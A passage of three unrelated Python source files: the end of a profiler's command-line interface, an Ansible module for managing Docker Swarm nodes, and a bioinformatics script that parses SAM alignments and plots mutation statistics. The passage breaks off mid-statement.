@cli.command() @click.argument('src', type=ViewerSource(), default=config_default('endpoint', DEFAULT_ENDPOINT)) @viewer_options def view(src, mono): """Inspect statistics by TUI view.""" src_type, src_name = src title = get_title(src_name, src_type) viewer, loop = make_viewer(mono) if src_type == 'dump': time = datetime.fromtimestamp(os.path.getmtime(src_name)) with open(src_name, 'rb') as f: profiler_class, (stats, cpu_time, wall_time) = pickle.load(f) viewer.set_profiler_class(profiler_class) viewer.set_result(stats, cpu_time, wall_time, title=title, at=time) viewer.activate() elif src_type in ('tcp', 'sock'): family = {'tcp': socket.AF_INET, 'sock': socket.AF_UNIX}[src_type] client = FailoverProfilingClient(viewer, loop.event_loop, src_name, family, title=title) client.start() try: loop.run() except KeyboardInterrupt: pass @cli.command('timeit-profile', aliases=['timeit']) @click.argument('stmt', metavar='STATEMENT', default='pass') @click.option('-n', '--number', type=int, help='How many times to execute the statement.') @click.option('-r', '--repeat', type=int, default=3, help='How many times to repeat the timer.') @click.option('-s', '--setup', default='pass', help='Statement to be executed once initially.') @click.option('-t', '--time', help='Ignored.') @click.option('-c', '--clock', help='Ignored.') @click.option('-v', '--verbose', help='Ignored.') @profiler_options @onetime_profiler_options @viewer_options def timeit_profile(stmt, number, repeat, setup, profiler_factory, pickle_protocol, dump_filename, mono, **_ignored): """Profile a Python statement like timeit.""" del _ignored globals_ = {} exec_(setup, globals_) if number is None: # determine number so that 0.2 <= total time < 2.0 like timeit. dummy_profiler = profiler_factory() dummy_profiler.start() for x in range(1, 10): number = 10 ** x t = time.time() for y in range(number): exec_(stmt, globals_) if time.time() - t >= 0.2: break dummy_profiler.stop() del dummy_profiler code = compile('for _ in range(%d): %s' % (number, stmt), 'STATEMENT', 'exec') __profile__(stmt, code, globals_, profiler_factory, pickle_protocol=pickle_protocol, dump_filename=dump_filename, mono=mono) # Deprecated. main = cli if __name__ == '__main__': cli(prog_name='python -m profiling')
#!/usr/bin/python # # (c) 2019 Piotr Wojciechowski <piotr@it-playground.pl> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: docker_node short_description: Manage Docker Swarm node version_added: "2.8" description: - Manages the Docker nodes via Swarm Manager. - This module allows to change the node's role, its availability, and to modify, add or remove node labels. options: hostname: description: - The hostname or ID of node as registered in Swarm. - If more than one node is registered using the same hostname the ID must be used, otherwise module will fail. type: str required: yes labels: description: - User-defined key/value metadata that will be assigned as node attribute. - Label operations in this module apply to the docker swarm node specified by I(hostname). Use M(docker_swarm) module to add/modify/remove swarm cluster labels. - The actual state of labels assigned to the node when module completes its work depends on I(labels_state) and I(labels_to_remove) parameters values. See description below. type: dict labels_state: description: - It defines the operation on the labels assigned to node and labels specified in I(labels) option. - Set to C(merge) to combine labels provided in I(labels) with those already assigned to the node. If no labels are assigned then it will add listed labels. For labels that are already assigned to the node, it will update their values. The labels not specified in I(labels) will remain unchanged. If I(labels) is empty then no changes will be made. - Set to C(replace) to replace all assigned labels with provided ones. If I(labels) is empty then all labels assigned to the node will be removed. type: str default: 'merge' choices: - merge - replace labels_to_remove: description: - List of labels that will be removed from the node configuration. The list has to contain only label names, not their values. - If the label provided on the list is not assigned to the node, the entry is ignored. - If the label is both on the I(labels_to_remove) and I(labels), then value provided in I(labels) remains assigned to the node. - If I(labels_state) is C(replace) and I(labels) is not provided or empty then all labels assigned to node are removed and I(labels_to_remove) is ignored. type: list elements: str availability: description: Node availability to assign. If not provided then node availability remains unchanged. choices: - active - pause - drain type: str role: description: Node role to assign. If not provided then node role remains unchanged. choices: - manager - worker type: str extends_documentation_fragment: - docker - docker.docker_py_1_documentation requirements: - "L(Docker SDK for Python,https://docker-py.readthedocs.io/en/stable/) >= 2.4.0" - Docker API >= 1.25 author: - Piotr Wojciechowski (@WojciechowskiPiotr) - Thierry Bouvet (@tbouvet) ''' EXAMPLES = ''' - name: Set node role docker_node: hostname: mynode role: manager - name: Set node availability docker_node: hostname: mynode availability: drain - name: Replace node labels with new labels docker_node: hostname: mynode labels: key: value labels_state: replace - name: Merge node labels and new labels docker_node: hostname: mynode labels: key: value - name: Remove all labels assigned to node docker_node: hostname: mynode labels_state: replace - name: Remove selected labels from the node docker_node: hostname: mynode labels_to_remove: - key1 - key2 ''' RETURN = ''' node: description: Information about node after 'update' operation returned: success type: dict ''' import traceback try: from docker.errors import DockerException, APIError except ImportError: # missing Docker SDK for Python handled in ansible.module_utils.docker.common pass from ansible.module_utils.docker.common import ( DockerBaseClass, RequestException, ) from ansible.module_utils._text import to_native from ansible.module_utils.docker.swarm import AnsibleDockerSwarmClient class TaskParameters(DockerBaseClass): def __init__(self, client): super(TaskParameters, self).__init__() # Spec self.name = None self.labels = None self.labels_state = None self.labels_to_remove = None # Node self.availability = None self.role = None for key, value in client.module.params.items(): setattr(self, key, value) class SwarmNodeManager(DockerBaseClass): def __init__(self, client, results): super(SwarmNodeManager, self).__init__() self.client = client self.results = results self.check_mode = self.client.check_mode self.client.fail_task_if_not_swarm_manager() self.parameters = TaskParameters(client) self.node_update() def node_update(self): if not (self.client.check_if_swarm_node(node_id=self.parameters.hostname)): self.client.fail("This node is not part of a swarm.") return if self.client.check_if_swarm_node_is_down(): self.client.fail("Can not update the node. The node is down.") try: node_info = self.client.inspect_node(node_id=self.parameters.hostname) except APIError as exc: self.client.fail("Failed to get node information for %s" % to_native(exc)) changed = False node_spec = dict( Availability=self.parameters.availability, Role=self.parameters.role, Labels=self.parameters.labels, ) if self.parameters.role is None: node_spec['Role'] = node_info['Spec']['Role'] else: if not node_info['Spec']['Role'] == self.parameters.role: node_spec['Role'] = self.parameters.role changed = True if self.parameters.availability is None: node_spec['Availability'] = node_info['Spec']['Availability'] else: if not node_info['Spec']['Availability'] == self.parameters.availability: node_info['Spec']['Availability'] = self.parameters.availability changed = True if self.parameters.labels_state == 'replace': if self.parameters.labels is None: node_spec['Labels'] = {} if node_info['Spec']['Labels']: changed = True else: if (node_info['Spec']['Labels'] or {}) != self.parameters.labels: node_spec['Labels'] = self.parameters.labels changed = True elif self.parameters.labels_state == 'merge': node_spec['Labels'] = dict(node_info['Spec']['Labels'] or {}) if self.parameters.labels is not None: for key, value in self.parameters.labels.items(): if node_spec['Labels'].get(key) != value: node_spec['Labels'][key] = value changed = True if self.parameters.labels_to_remove is not None: for key in self.parameters.labels_to_remove: if self.parameters.labels is not None: if not self.parameters.labels.get(key): if node_spec['Labels'].get(key): node_spec['Labels'].pop(key) changed = True else: self.client.module.warn( "Label '%s' listed both in 'labels' and 'labels_to_remove'. " "Keeping the assigned label value." % to_native(key)) else: if node_spec['Labels'].get(key): node_spec['Labels'].pop(key) changed = True if changed is True: if not self.check_mode: try: self.client.update_node(node_id=node_info['ID'], version=node_info['Version']['Index'], node_spec=node_spec) except APIError as exc: self.client.fail("Failed to update node : %s" % to_native(exc)) self.results['node'] = self.client.get_node_inspect(node_id=node_info['ID']) self.results['changed'] = changed else: self.results['node'] = node_info self.results['changed'] = changed def main(): argument_spec = dict( hostname=dict(type='str', required=True), labels=dict(type='dict'), labels_state=dict(type='str', default='merge', choices=['merge', 'replace']), labels_to_remove=dict(type='list', elements='str'), availability=dict(type='str', choices=['active', 'pause', 'drain']), role=dict(type='str', choices=['worker', 'manager']), ) client = AnsibleDockerSwarmClient( argument_spec=argument_spec, supports_check_mode=True, min_docker_version='2.4.0', min_docker_api_version='1.25', ) try: results = dict( changed=False, ) SwarmNodeManager(client, results) client.module.exit_json(**results) except DockerException as e: client.fail('An unexpected docker error occurred: {0}'.format(e), exception=traceback.format_exc()) except RequestException as e: client.fail('An unexpected requests error occurred when docker-py tried to talk to the docker daemon: {0}'.format(e), exception=traceback.format_exc()) if __name__ == '__main__': main()
#Author: MKT #purpose: to parse bowtie output files (after they have been weighted based on multiple mappings with weight_repeats.py and convert to pickled python dictionary. This one hashes by the start position of the read so it will be fast to classify them into exons, introns, etc. with the annotation file. #version history: #created 9/?/09 #updated 1/26/10- changed it to hash by start with respect to strand and not the middle of the read. For - strand reads this means adding 34 to the start w.r.t the + strand for a 35 bp read. #4/1/10 Pavan: commented out superfluous print commands #5/26/10 Boris: adjusting antisense read position by 20 instead of 34, since the mapping only uses 21 bp, this needs to be changed if the mapping size is changed. If read sizes aren't constant, then OH BOY!!! Also, added M1killer chromosome #6/24/10 Boris: Corrected for bowtie vs genome indexing #6/23/2013 Boris: Removed arbitrary hard-coding chromosome names, and accounted for split reads (indels, splice junctions) #7/21/2015 Thomas: Cleaned up code a bit, in addition to the mapping positions of the read 5p ends, it now outputs in the same format 1) number of times each position was covered by a read, 2) number of times each position was mutated relatove to reference sequence strands= ['+','-'] import sys, cPickle as pickle, gzip, re, numpy, os import mod_settings, mod_utils import matplotlib.pyplot as plt plt.rcParams['pdf.fonttype'] = 42 #leaves most text as actual text in PDFs, not outlines from collections import defaultdict def createStrandDict(strands): """ """ d = {} for strand in strands: d[strand] = {} return d def pickleDict(d, fn, suffix): fn = fn.split('.') out_fn = ''.join([fn[0]+suffix+'.pkl']) with open(out_fn, 'w') as g: pickle.dump(d, g) def readGenomicCoverage(rel_cov, strand, read_start): """ Assumes: rel_cov, a list relating position in read (i) to relative genomic postion rel_cov[i] strand, the mapping strand of the read read_start, the starting genomic position of the read Returns: pos_l, a list relating position in read (i) to absolute genomic position pos_l[i] """ if strand == '+': pos_l = [p+read_start for p in rel_cov] elif strand == '-': pos_l = [read_start-p for p in rel_cov] return pos_l def parse_MDz_and_cigar(cigarString, MDzString, mappingLength, seq): """ Assumes: cigarString - a string of [#][A-Z][#][A-Z] etc... that described the alignment of a read to the genome MDzString, the MD:z string for the current read genome_cov, a list relating position in read (i) to absolute genomic position pos_l[i] seq, a string representation of the read Returns: A list of positions with mismatches in absolute genomic position the genomic distance spanned by this read CIGAR STRING: M 0 alignment match (can be a sequence match or mismatch) I 1 insertion to the reference D 2 deletion from the reference N 3 skipped region from the reference S 4 soft clipping (clipped sequences present in SEQ) H 5 hard clipping (clipped sequences NOT present in SEQ) P 6 padding (silent deletion from padded reference) = 7 sequence match X 8 sequence mismatch H can only be present as the rst and/or last operation. S may only have H operations between them and the ends of the CIGAR string. For mRNA-to-genome alignment, an N operation represents an intron. For other types of alignments, the interpretation of N is not de ned. 4 Sum of lengths of the M/I/S/=/X operations shall equal the length of SEQ. """ #Parse cigar strings into numbers & tags numbers = re.split('[A-Z,=]', cigarString)[:-1] #not sure why, but this seems to produce an extra blank entry thay I'm stripping off tags = re.split('[0-9]*', cigarString)[1:] numbers = [int(n) for n in numbers] assert len(numbers) == len(tags) genomeMulitpliers = {'M':1, 'I':0, 'D':1, 'N':1, '=':1, 'X':1} readMulitpliers = {'M':1, 'I':1, 'D':0, 'N':0, '=':1, 'X':1} # Initialize counters readMappingSpan, genomeMappingSpan, genome_pos = 0, 0, 0 genomeCoverage = [] #print 'New Read' insertions = {}# need to know insertion positions and sizes in read for later parsing cigar_tups = zip(tags, numbers) for cigar in cigar_tups: tag, tag_len = cigar if tag == 'I': insertions[readMappingSpan] = tag_len genome_multiplier = genomeMulitpliers[tag] read_multiplier = readMulitpliers[tag] readMappingSpan += read_multiplier*tag_len genomeMappingSpan += genome_multiplier*tag_len # Determines which genomic positions relative to the read 5' end are covered by a read # For M, =, X: positions covered by read: so add to list, and increment counter # For D (deletion) and N (skipped region, similar to deletion, meant for introns): positions covered by read: # so add to list, and increment counter, so the length of the array # can be longer than the length of the read, but it should match the genome mapping span # I include N, since for my application of mapping to rRNA, anything defined as N should be an RT deletion that # I consider spanned by the read. If there are true intronic reads, then the counter ought be incremented without # adding to the array. #if genome_multiplier: # Increment counter if genome multiplier = 1, ie position spanned by read # if tag in 'M=XDN': # genomeCoverage += range(genome_pos,genome_pos+tag_len) # genome_pos += tag_len assert readMappingSpan == mappingLength #assert genomeMappingSpan == len(genomeCoverage) genomeCoverage = range(genomeMappingSpan) """ test all cases at: http://davetang.org/muse/2011/01/28/perl-and-sam/ The MD field aims to achieve SNP/indel calling without looking at the reference. For example, a string `10A5^AC6' means from the leftmost reference base in the alignment, there are 10 matches followed by an A on the reference which is different from the aligned read base; the next 5 reference bases are matches followed by a 2bp deletion from the reference; the deleted sequence is AC; the last 6 bases are matches. The MD field ought to match the CIGAR string. The string '0T0C37T' indicates the first base of the read is a mismatch from the reference sequence of T, the second base is a mismatch from the reference sequence C, followed by 37 matches, with a final mismatch from the reference A Boris 20151116 - this is getting an overhaul to deal with indels tags THomas's `10A5^AC6' example above should identify a mismatch at position 10 (zero-indexed), a deletion of length 2 at position 16 all indels will be assigned to the 3' end of the event. Only deletions will be used for the final count """ MDz = MDzString.split(':')[2] MD_tags = re.findall('[0-9]+|[A-Z,^]+',MDz) MD_tags = [int(x) if re.match('[0-9]+',x) else x for x in MD_tags] mutations_rel_read = ['M']*readMappingSpan #will keep track of mutations along the read, first nuc of read is position 0 mutations_rel_genome = ['M']*genomeMappingSpan #will keep track of mutations along the genome, first nuc of read is position 0 genomic_event_positions = [] # A list to store positions of mismatches read_counter = 0 # A counter to store the current position of the read (0 indexed) genome_counter = 0 # A counter to store the current position along the genome (0 indexed with respect to read start) for tag in MD_tags: #insertion relative to genome? if read_counter in insertions: assert insertions[read_counter] != 0 insertion_size = insertions[read_counter] read_counter += insertions[read_counter] assert mutations_rel_read[read_counter-1] =='M' mutations_rel_read[read_counter-1] = ('I', insertion_size) if tag in ['A','T','C','G']: #If the tag is a base it indicates a mismatch if seq[read_counter] != 'N': # We want to ignore 'N' bases in sequence assert mutations_rel_read[read_counter] =='M' assert mutations_rel_genome[genome_counter] =='M' mutations_rel_read[read_counter] = (tag, seq[read_counter]) mutations_rel_genome[genome_counter] = (tag, seq[read_counter]) genomic_event_positions.append(read_counter) # Append the current position in the read read_counter += 1 #Increment the counter genome_counter += 1 elif isinstance(tag, int): # If the tag is an int, this represents matches genome_counter += tag read_counter += tag # Increment counter by number of matches elif tag.startswith('^'):#the read contains a deletion relative to the genome deletion_length = len(tag)-1 genome_counter += deletion_length assert mutations_rel_genome[genome_counter-1] =='M' mutations_rel_genome[genome_counter-1] = ('D', deletion_length) genomic_event_positions.append(genome_counter-1) #print mutations_rel_read #print mutations_rel_genome #print read_counter, genome_counter #print genomeCoverage return genomic_event_positions, genomeCoverage, mutations_rel_genome, mutations_rel_read, readMappingSpan, genomeMappingSpan def checkTag(tag, fields): """ Assumes: tag, a str specifying a SAMtools tag fields, a SAMfile line in list format Does: Determines if the tag is at the expected index, if not, searches for the tag in fields Returns: fields[i], containing the tag """ tag_fields = [field for field in fields[7:] if tag in field] if len(tag_fields) == 0:#uh oh, no tag found if tag == 'NH:i:': #my alignments seem to lack this tag return 'NH:i:1' return tag_fields[0] def pie_read_5p_ends(read_5p_ends, genome_dict, out_prefix): fig = plt.figure(figsize=(8,17)) plot = fig.add_subplot(211) nuc_counts = defaultdict(int) for chromosome in read_5p_ends['+']: for position in read_5p_ends['+'][chromosome]: if position-1 > 0 : nuc = genome_dict[chromosome][position-1] nuc_counts[nuc] += read_5p_ends['+'][chromosome][position] labels = sorted(nuc_counts.keys()) sizes = [nuc_counts[nt] for nt in labels] plot.pie(sizes, labels = labels, colors = mod_utils.rainbow) plot.set_title('nt exactly at read 5p ends across rRNA') plot = fig.add_subplot(212) nuc_counts = defaultdict(int) for chromosome in read_5p_ends['+']: for position in read_5p_ends['+'][chromosome]: if position-2 > 0 : nuc = genome_dict[chromosome][position-2] nuc_counts[nuc] += read_5p_ends['+'][chromosome][position] labels = sorted(nuc_counts.keys()) sizes = [nuc_counts[nt] for nt in labels] plot.pie(sizes, labels = labels, colors = mod_utils.rainbow) plot.set_title('1nt upstream of read 5p ends across rRNA') plt.savefig(out_prefix + '_nt_5p_ends_pie.pdf', transparent='True', format='pdf') plt.clf() def plot_mutated_nts_pie(mutated_nts_count, title, out_prefix): fig = plt.figure(figsize=(8,8)) plot = fig.add_subplot(111)#first a pie chart of mutated nts labels = sorted(mutated_nts_count.keys()) sizes = [mutated_nts_count[nt] for nt in labels] total = float(sum(sizes)) merged_labels = ['%s %.3f' % (labels[i], sizes[i]/total) for i in range(len(sizes))] plot.pie(sizes, labels = merged_labels, colors = mod_utils.rainbow) plot.set_title(title) plt.savefig(out_prefix + '.pdf', transparent='True', format='pdf') plt.clf() def plot_full_mutation_stats(mutations_counts, indel_distribution, mutations_by_position, positional_coverage, title, x_label, out_prefix): fig = plt.figure(figsize=(16,16)) fig.suptitle(title) plot = fig.add_subplot(221)#first a pie chart of mutated nts labels = sorted(mutations_counts.keys()) sizes = [mutations_counts[nt] for nt in labels] plot.pie(sizes, labels = labels, colors = mod_utils.rainbow) plot = fig.add_subplot(222)#second a histogram of indel sizes bins = range(1, 20) bins.append(100) plot.hist(indel_distribution, color = mod_utils.black, bins = bins) plot.set_xlim(0,10) plot.set_xticks(numpy.arange(0,10)+0.5) plot.set_xticklabels(numpy.arange(0,10)) plot.set_xlabel(x_label) plot.set_ylabel("# events") bar_width = 0.5 all_events = sorted(mutations_counts, key=mutations_counts.get, reverse=True) top_events = all_events[:len(mod_utils.rainbow)] mut_positions = sorted(mutations_by_position.keys()) cov_positions = sorted(positional_coverage.keys()) plot = fig.add_subplot(223)#a stacked bar graph of positional mutation rates bottoms = [0]*len(mut_positions) bottoms = numpy.array(bottoms) plot_layers = [] color_index = 0 for event in top_events: event_amounts = [mutations_by_position[position][event] if event in mutations_by_position[position] else 0 for position in mut_positions] plot_layers.append(plot.bar(mut_positions, event_amounts, bar_width, bottom = bottoms, color = mod_utils.rainbow[color_index%len(mod_utils.rainbow)], label=event, lw = 0)) color_index += 1 bottoms = bottoms + numpy.array(event_amounts) plot.set_ylabel("mutation counts") plot.set_xlabel("read position") plot.set_xticks(numpy.array(mut_positions)[::5]+bar_width/2.0) plot.set_xticklabels(mut_positions[::5]) plot = fig.add_subplot(224)#a stacked bar graph of positional mutation rates normalized to coverage bottoms = [0]*len(mut_positions) bottoms = numpy.array(bottoms) plot_layers = [] color_index = 0 for event in top_events: event_amounts = [mutations_by_position[position][event]/positional_coverage[position] if (event in mutations_by_position[position] and positional_coverage[position]>100) else 0 for position in mut_positions] plot_layers.append(plot.bar(mut_positions, event_amounts, bar_width, bottom = bottoms, color = mod_utils.rainbow[color_index%len(mod_utils.rainbow)], label=event, lw = 0)) color_index += 1 bottoms = bottoms + numpy.array(event_amounts) plot.set_ylabel("mutation counts/coverage") plot.set_ylim(0,.02) plot.set_xlabel("read position") plot.set_xticks(numpy.array(mut_positions)[::5]+bar_width/2.0) plot.set_xticklabels(mut_positions[::5]) lg=plt.legend(loc=2,prop={'size':10}, labelspacing=0.2) lg.draw_frame(False) plt.savefig(out_prefix + '.pdf', transparent='True', format='pdf') plt.clf() def normed_mutation_rate_histogram(normalized_mutations, title, output_prefix): mutation_densities = [] for strand in normalized_mutations: for chromosome in normalized_mutations[strand]: mutation_densities = mutation_densities + normalized_mutations[strand][chromosome].values() fig = plt.figure(figsize=(16,16)) plot = fig.add_subplot(111) step = 0.0001 max = 0.01 bins = numpy.arange(0,max,step) bins = numpy.append(bins, 1+step) plot.hist(mutation_densities, color = mod_utils.black, bins = bins) plot.set_xlim(0,max+step) #plot.set_xticks(numpy.arange(0,10)+0.5) #plot.set_xticklabels(numpy.arange(0,10)) plot.set_xlabel('mutations/coverage') plot.set_ylabel("# positions") #plot.set_yscale('log') plot.set_title(title) plt.savefig(output_prefix + '_mut_density.pdf', transparent='True', format='pdf') plt.clf() def normalized_mutation_rates(mutation_counts, coverage_counts): normalized_mutations = {} for strand in mutation_counts: if not strand in normalized_mutations: normalized_mutations[strand] = {} for chromosome in mutation_counts[strand]: if not chromosome in normalized_mutations[strand]: normalized_mutations[strand][chromosome] = {} for position in mutation_counts[strand][chromosome]: if float(coverage_counts[strand][chromosome][position])>0: normalized_mutations[strand][chromosome][position] = \ float(mutation_counts[strand][chromosome][position])/float(coverage_counts[strand][chromosome][position]) return normalized_mutations def count_reads(lib_settings): """ """ # Create empty dicts for storing counts data srt_dict = createStrandDict(strands) # Counts for 5' end of read our standard data format cov_dict = createStrandDict(strands) # Counts of times covered by a read mut_dict = createStrandDict(strands) # Counts of mismatches at a position read_mutations = defaultdict(int) #counts different types of mutations relative to read genome_mutations = defaultdict(int) #counts different types of mutations relative to genome mutations_by_read_position = defaultdict(dict) read_position_coverage = defaultdict(float) mutations_by_genome_position = defaultdict(dict) genome_position_coverage = defaultdict(float) mutated_nts = defaultdict(float) read_insertion_sizes = [] genomic_deletion_sizes = [] with gzip.open(lib_settings.get_mapped_reads_sam_gz(), 'r') as f: for line in f: # Iterate through SAM file lines if not line.startswith('@'): # Parse line into relevant strings fields = line.strip().split('\t') ID = fields[0] #the first field in the mapped file corresponds to a unique id number for that read- these should correspond to the names in the raw_seqs dictionary flag = int(fields[1]) ''' The flag field provides a lot of info about the read, it is the decimal representation of a bit string, each digit of which is true or false Bit 0 = The read was part of a pair during sequencing Bit 1 = The read is mapped in a pair Bit 2 = The query sequence is unmapped Bit 3 = The mate is unmapped Bit 4 = Strand of query (0=forward 1=reverse) So, to see if a flag represents a read on the - strand, we evaluate (16 & 'flag'), where & is the bitwise and operator, which will be non-zero (True) only if this read is on the - strand ''' if (4&flag):#if this is an unmapped read, don't bother continue if (16&flag): strand = '-' else: strand = '+' chrom = fields[2] MAPQ = int(fields[4]) if int(MAPQ) >= lib_settings.get_property('min_mapping_quality'): cigarString = fields[5] seq = fields[9] mappingLength = len(seq) qScores = fields[10] # Some lines seem to lack some strings this throws of indexing of NM:i, MD:Z, and NH:i strings NHstr = checkTag('NH:i:',fields) NMstr = checkTag('NM:i:',fields) MDstr = checkTag('MD:Z:',fields) assert 'NM:i' in NMstr assert 'MD:Z' in MDstr assert 'NH:i' in NHstr multiplicity = float(NHstr.split(':')[2]) fields = line.strip().split('\t') counts = float(1.0/multiplicity) # Weight of read MDzString = MDstr # Add subdicts for chromosome if needed if chrom not in srt_dict[strand]: srt_dict[strand][chrom] = defaultdict(float) if chrom not in cov_dict[strand]: cov_dict[strand][chrom] = defaultdict(float) if chrom not in mut_dict[strand]: mut_dict[strand][chrom] = defaultdict(float) # Parse cigar string, get genome mapping span, and relative genomic positions covered by read rel_genomic_event_positions, rel_genome_coverage, mutations_rel_genome, mutations_rel_read, readMappingSpan, genomeMappingSpan = parse_MDz_and_cigar(cigarString, MDzString, mappingLength, seq) for pos in range(len(mutations_rel_genome)): genome_position_coverage[pos] += counts event = mutations_rel_genome[pos] if not event == 'M': #count if it's not a match assert event[0] != 'I' if event[0] == 'D': genomic_deletion_sizes.append(event[1]) event = event[0] if event not in mutations_by_genome_position[pos]: mutations_by_genome_position[pos][event] = 0 mutations_by_genome_position[pos][event] += counts genome_mutations[event] += counts if event[0] in 'ATCG': mutated_nts[event[0]] += counts for pos in range(len(mutations_rel_read)): read_position_coverage[pos] += counts event = mutations_rel_read[pos] if not event == 'M': #count if it's not a match assert event[0] != 'D' if event[0] == 'I': read_insertion_sizes.append(event[1]) event = event[0] if event not in mutations_by_read_position[pos]: mutations_by_read_position[pos][event] = 0 mutations_by_read_position[pos][event] += counts read_mutations[event] += counts # Set start position of read if strand== '+': start=int(fields[3]) else: #When a read maps to the minus strand, bowtie returns the reverse complement, and indicates # where this reverse mapped on the + strand. Thus the original 5' end of the read actually # was x nt downstream on the + strand start=int(fields[3])+genomeMappingSpan-1 # translate relative positions to absolute positions genome_cov = readGenomicCoverage(rel_genome_coverage, strand, start) # get genome coverage srt_dict[strand][chrom][start] += counts #just add the number of counts to that start position for pos in genome_cov: # Increment positions for coverage dict cov_dict[strand][chrom][pos] += counts # If mismatches need to parse, get the absolute genomic pos, and increment counters genMismatches = readGenomicCoverage(rel_genomic_event_positions, strand, start) for event_position in genMismatches: mut_dict[strand][chrom][event_position] += counts mod_utils.makePickle(srt_dict, lib_settings.get_read_5p_counts()) mod_utils.makePickle(cov_dict, lib_settings.get_positional_coverage()) mod_utils.makePickle(mut_dict, lib_settings.get_mutation_counts()) mod_utils.makePickle(genome_mutations, lib_settings.get_counting_prefix() + '.genome_mutations.pkl') mod_utils.makePickle(mutations_by_genome_position, lib_settings.get_counting_prefix() + '.genome_position_mutations.pkl') mod_utils.makePickle(genome_position_coverage, lib_settings.get_counting_prefix() + '.genome_position_coverage.pkl') mod_utils.makePickle(mutated_nts, lib_settings.get_counting_prefix() + '.nt_mutations.pkl') mod_utils.makePickle(read_mutations, lib_settings.get_counting_prefix() + '.read_mutations.pkl') mod_utils.makePickle(mutations_by_read_position, lib_settings.get_counting_prefix() + '.read_position_mutations.pkl') mod_utils.makePickle(read_position_coverage, lib_settings.get_counting_prefix() + '.read_position_coverage.pkl') mod_utils.makePickle(genomic_deletion_sizes, lib_settings.get_counting_prefix() + '.deletion_sizes.pkl') mod_utils.makePickle(read_insertion_sizes, lib_settings.get_counting_prefix() + '.insertion_sizes.pkl') normalized_mutations = normalized_mutation_rates(mod_utils.unPickle(lib_settings.get_mutation_counts()), mod_utils.unPickle(lib_settings.get_positional_coverage())) mod_utils.makePickle(normalized_mutations, lib_settings.get_normalized_mutation_counts()) plot_mutated_nts_pie(mod_utils.unPickle(lib_settings.get_counting_prefix() + '.nt_mutations.pkl'), 'mutated rRNA nts in ' + lib_settings.sample_name, lib_settings.get_counting_prefix()+'.mutated_nts' ) plot_full_mutation_stats(mod_utils.unPickle(lib_settings.get_counting_prefix() + '.read_mutations.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.insertion_sizes.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.read_position_mutations.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.read_position_coverage.pkl'), 'mutations wrt reads', "insertion size", lib_settings.get_counting_prefix()+'.read_mutations') plot_full_mutation_stats(mod_utils.unPickle(lib_settings.get_counting_prefix() + '.genome_mutations.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.deletion_sizes.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.genome_position_mutations.pkl'), mod_utils.unPickle(lib_settings.get_counting_prefix() + '.genome_position_coverage.pkl'), 'mutations wrt genome', "deletion size", lib_settings.get_counting_prefix()+'.genome_mutations') pie_read_5p_ends(mod_utils.unPickle(lib_settings.get_read_5p_counts()), mod_utils.convertFastaToDict(lib_settings.experiment_settings.get_rRNA_fasta()), lib_settings.get_counting_prefix()) normed_mutation_rate_histogram(mod_utils.unPickle(lib_settings.get_normalized_mutation_counts()), lib_settings.sample_name, lib_settings.get_counting_prefix()) def test(): """ with uncommented print statements should get: parse_MDz_and_cigar('36M', 'MD:Z:1A0C0C0C1T0C0T27', 36, 'CGATACGGGGACATCCGGCCTGCTCCTTCTCACATG') ['M', ('A', 'G'), ('C', 'A'), ('C', 'T'), ('C', 'A'), 'M', ('T', 'G'), ('C', 'G'), ('T', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] ['M', ('A', 'G'), ('C', 'A'), ('C', 'T'), ('C', 'A'), 'M', ('T', 'G'), ('C', 'G'), ('T', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] 36 36 parse_MDz_and_cigar('6M1I29M', 'MD:Z:0C1C0C1C0T0C27', 36, 'GAGACGGGGTGACATCCGGCCTGCTCCTTCTCACAT') [('C', 'G'), 'M', ('C', 'G'), ('C', 'A'), 'M', ('C', 'G'), ('I', 1), ('T', 'G'), ('C', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] [('C', 'G'), 'M', ('C', 'G'), ('C', 'A'), 'M', ('C', 'G'), ('T', 'G'), ('C', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] 36 35 parse_MDz_and_cigar('9M9D27M', 'MD:Z:2G0A5^ATGATGTCA27', 36, 'AGTGATGGGGGGGTTCCAGGTGGAGACGAGGACTCC') ['M', 'M', ('G', 'T'), ('A', 'G'), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] ['M', 'M', ('G', 'T'), ('A', 'G'), 'M', 'M', 'M', 'M', 'M', ('D', 9), 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M', 'M'] 36 45 """ print "parse_MDz_and_cigar('36M', 'MD:Z:1A0C0C0C1T0C0T27', 36, 'CGATACGGGGACATCCGGCCTGCTCCTTCTCACATG')" parse_MDz_and_cigar('36M', 'MD:Z:1A0C0C0C1T0C0T27', 36, 'CGATACGGGGACATCCGGCCTGCTCCTTCTCACATG') print "parse_MDz_and_cigar('6M1I29M', 'MD:Z:0C1C0C1C0T0C27', 36, 